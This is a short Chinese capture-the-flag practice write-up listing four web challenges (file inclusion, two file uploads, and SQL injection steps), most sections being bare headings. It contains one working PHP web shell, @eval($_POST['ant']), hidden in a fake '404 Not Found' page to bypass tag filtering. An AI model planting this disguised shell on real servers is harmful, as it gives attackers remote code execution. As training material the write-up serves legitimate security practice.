周练2
1.bugku文件包含2


发现上传点

发现<%php %>被屏蔽了。
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
<script language="pHp">
@eval($_POST['ant'])
</script>
</head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>

2.攻防世界之upload1

1.

2.


3.攻防世界 - NewsCenter
1.测试注入点

2.检查回显

3.查库

4. 查表

5. 查列

6.打印数据

4.bugku 文件上传







浙公网安备 33010602011771号